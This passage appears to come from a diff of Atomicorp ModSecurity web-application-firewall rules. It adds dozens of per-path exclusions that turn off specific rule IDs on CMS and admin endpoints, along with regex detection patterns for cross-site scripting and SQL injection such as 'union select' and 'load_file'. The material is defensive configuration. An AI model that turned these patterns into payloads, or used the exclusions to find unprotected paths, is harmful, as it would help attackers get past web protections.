:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?script|< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|document\.write ?\(|(?:<|< ?/) ?(?:(?:java|vb)script|applet|activex|chrome)|< ?/?i?frame|\% ?env)"          "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase,multiMatch,id:390148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_92487
+
+SecRule REQUEST_FILENAME "/api/podapi/" "phase:2,id:92488,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/templatesavechanges" "phase:2,id:92489,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340835,ctl:ruleRemovebyID=340836,ctl:ruleRemovebyID=340837"
+
+SecRule REQUEST_FILENAME "accordioncheckout\.do" "phase:2,id:92490,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "accordion\.do" "phase:2,id:92491,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/formbuilder/index/submit" "phase:2,id:92492,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin-exec\.php" "phase:2,id:92493,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/press-this\.php" "phase:2,id:92494,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/includes/apps/ajax_func\.php" "phase:2,id:92495,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/pw/page/edit/" "phase:2,id:92496,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/bitrix/tools/autosave\.php" "phase:2,id:92497,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/bitrix/tools/public_file_edit_src\.php" "phase:2,id:92498,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/bitrix/admin/fileman_file_edit\.php" "phase:2,id:92499,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/manage/faq/edit/" "phase:2,id:92500,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/engine/update\.php" "phase:2,id:92501,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/manager/ispmgr" "phase:2,id:92502,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/amember/aff/click-js/" "phase:2,id:92503,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/manage/seo/" "phase:2,id:92504,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/admin/admin-data\.php" "phase:2,id:92505,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/edit_interface\.php" "phase:2,id:92506,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/portal/policies-exec\.php" "phase:2,id:92507,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/php/successjunction\.php" "phase:2,id:92508,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/test/addquestion/" "phase:2,id:92509,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/clientsdomainreg\.php" "phase:2,id:92510,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/profiles\.php" "phase:2,id:92511,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/configdomains\.php" "phase:2,id:92512,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/plugins/moxiemanager/api\.php" "phase:2,id:92513,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/orders/order_userorderform\.php" "phase:2,id:92514,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/shibboleth\.sso/slo/redirect" "phase:2,id:92515,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/moodle/mod/questionnaire/complete\.php" "phase:2,id:92516,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/structure/types/import" "phase:2,id:92517,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367"
+
+SecRule REQUEST_FILENAME "/wp-admin/async-upload\.php" "phase:2,id:92518,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/admin/products/edit\.php" "phase:2,id:92519,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/linkit/autocomplete/" "phase:2,id:92520,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/sys_sbc/" "phase:2,id:92521,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/auroadmin/update-cms\.php" "phase:2,id:92522,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/manage/article/" "phase:2,id:92523,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/processing\.php" "phase:2,id:92524,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018"
+
+SecRule REQUEST_FILENAME "/server-side\.php" "phase:2,id:92525,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/members/access/admin-setup/" "phase:2,id:92526,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018"
+
+SecRule REQUEST_FILENAME "/panelediting\.php" "phase:2,id:92527,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/sliderdesign\.php" "phase:2,id:92528,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/smb/file-manager/code-editor" "phase:2,id:92529,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/cf-api/" "phase:2,id:92530,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/projects/savedraftproject/" "phase:2,id:92531,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/scriptediting\.php" "phase:2,id:92532,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=340157"
+
+SecRule REQUEST_FILENAME "/administration/" "phase:2,id:92533,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/update_row/" "phase:2,id:92534,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=30147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/luxeadmin/index\.php" "phase:2,id:92535,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/wp-cron\.php" "phase:2,id:92536,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390616"
+
+SecRule REQUEST_FILENAME "/mip-send\.php" "phase:2,id:92537,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=350163"
+
+SecRule REQUEST_FILENAME "/mobilecart\.php" "phase:2,id:92538,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/cart" "phase:2,id:92539,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/cart\.php" "phase:2,id:92540,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/wp-json/yoast/v1/prominent_words/" "phase:2,id:92541,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/create-project/article/" "phase:2,id:92542,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admincontrolpanel/user\.php" "phase:2,id:92543,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/entity_reference_autocomplete/" "phase:2,id:92544,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/assets" "phase:2,id:92545,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/pages/admintravels\.php" "phase:2,id:92546,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/pages/admintravels\.php" "phase:2,id:92547,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/index\.php/jtlconnector/" "phase:2,id:92548,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/v1/json/obmstore\.image\.delete/" "phase:2,id:92549,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/v1/json/obmstore" "phase:2,id:92550,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=380018"
+
+SecRule REQUEST_FILENAME "/v1/json/obmstore\.template\.convert" "phase:2,id:92551,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=380018"
+
+SecRule REQUEST_FILENAME "/obm/resources/javascript/emaileditor/index\.html" "phase:2,id:92552,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=380018"
+
+SecRule REQUEST_FILENAME "/amember/admin-users/autocomplete" "phase:2,id:92553,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/cgi-bin/ms000001\.pl" "phase:2,id:92554,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019"
+
+SecRule REQUEST_FILENAME "/data/feed/rss\.php" "phase:2,id:92555,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/wp-content/uploads/galleries/" "phase:2,id:92556,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/img/homepage/" "phase:2,id:92557,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/services/bmreport\.json" "phase:2,id:92558,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/members/access/default/admin-payments/" "phase:2,id:92559,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/mailscript/emailc\.php" "phase:2,id:92560,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/blog_edit\.php" "phase:2,id:92561,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340159"
+SecAction "phase:2,id:92562,t:none,pass,nolog,skipAfter:END_RULES_92562"
+
+SecRule ARGS|XML:/*|!ARGS:/article/|!ARGS:/replaceAll/|!ARGS:areas|!ARGS:/^wpt_/|!ARGS:field_value_mapping|!ARGS:/post_code/|!ARGS:tHtml|!ARGS:/_dnn/|!ARGS:actionFilter|!ARGS:Error|!ARGS:code|!ARGS:thecode|!ARGS:param[DEFAULTVALUE]|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:data|!ARGS:resolution|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/prevObject/|!ARGS:/^Cms_Page/|!ARGS:json|!ARGS:/php/|!ARGS:wpSummary|!ARGS:/teaser/|!ARGS:fdata|!ARGS:file_content|!ARGS:/narrative/|!ARGS:data|!ARGS:/database/|!ARGS:/sql/|!ARGS:prefix|!ARGS:contenido|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:/txt/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:description|!ARGS:/message/|!ARGS:/content/|!ARGS:comment|!ARGS:p_action|!ARGS:/report/|!ARGS:/narrative/|!ARGS:/FCKeditor/  "(?:\w ?(?:user|and) {1,100}. char\([0-9]| \b(?:execute|convert)\(|; ?\bdelete\b.{1,100}?;(?:insert|declare ?\@|varchar) ?|and .{1,100} \( ?select .{1,100} from |\bdrop\b {1,100}. table |(?:declare|convert) .{1,100} varchar\(|null ?, ?(?:null ?, ?(?:null|accesslevel|user_name)) ?,|\bconcat\(|union select |union all select|\bcast\b .{1,50}\( as |xecresultset|' ?; ?declare\b @|; ?set @|select (?:load_file|char\()|(?:insert|remark)test ?;|\bcreate\b table [a-z0-9]+ \()"                 "phase:2,deny,log,auditlog,status:403,capture,id:344159,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)',logdata:'%{TX.0}',multiMatch,tag:'SQLi'"
+
+SecMarker END_RULES_92562
+
+SecRule REQUEST_FILENAME "/wp-admin/codisto/ebaytab/" "phase:2,id:92563,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/data" "phase:2,id:92564,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:92565,t:none,pass,nolog,skipAfter:END_RULES_92565"
+
+SecRule ARGS|ARGS_NAMES|!ARGS:/li_field/|!ARGS:/media/|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/go_code/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:message|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/preview/|!ARGS:/tracking_extra/|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/field_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:/^texte$/|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:tracking_code|!ARGS:whats-new|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS